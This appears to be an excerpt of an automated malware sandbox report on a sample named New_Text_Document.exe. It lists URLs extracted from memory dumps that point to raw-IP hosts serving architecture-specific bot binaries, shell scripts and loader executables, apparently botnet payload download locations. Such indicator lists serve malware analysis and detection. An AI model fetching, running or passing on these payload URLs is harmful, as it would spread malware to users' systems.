                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.146.26/mpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.146.26/ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.146.26/sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.146.26/spc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.146.26/x86
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.146.77/bins/sora.arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.146.77/bins/sora.ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.146.77/bins/sora.spc
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.146.77/bins/sora.x86
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.169.247/arm
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.169.247/arm5
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.169.247/arm6
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.169.247/arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.169.247/jack5tr.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.169.247/m68k
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.169.247/mips
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.169.247/mpsl
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.169.247/ohshit.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.169.247/ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.169.247/sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.169.247/spc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.169.247/x86
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.95.169.247/x86_64
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.0.197.32:27311/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.0.203.109:25008/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.100.49.235:63034/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.100.5.56:45003/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.100.50.137:56504/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.107.215.239:31018/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.12.223.23:28544/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.139.252.3:16970/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.175.138.75:11074/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.175.22.54:24603/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.183.221.4/350/audiodgse.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.21.179.164:6981/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.219.131.105:1423/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.236.65.108:55511/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.236.65.83:54661/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.238.228.206:62655/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.243.179.116:20768/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.6.1.3:52851/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.111.23.242/m.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.147.108.143:26517/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.154.92.13:52373/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.157.96.228:26269/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.176.252.169:29953/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.180.188.158:54018/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.192.40.86:17613/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.197.31.176:11806/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.46.231.38:54076/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.61.86.56:65317/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://47.98.224.91/buding.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.142.114.242:6220/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.143.43.93:2283/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.158.112.149:50607/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.158.197.108:22144/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.158.201.200:54622/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.158.202.113:26387/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.158.204.118:18461/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.158.206.47:52010/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.174.82.174:53603/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.176.181.215:48047/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.187.235.120:62691/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.213.157.76:43140/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.213.157.87:55553/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.213.187.75:62474/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.213.216.120:28443/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.213.228.23:10549/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.213.228.82:26144/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.213.231.81:13575/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.69.11.126:10721/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://49.89.115.127:17171/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.133.65.53/Oracle/$77_loader.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.201.176.87:11374/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://5.201.184.74:27412/.i
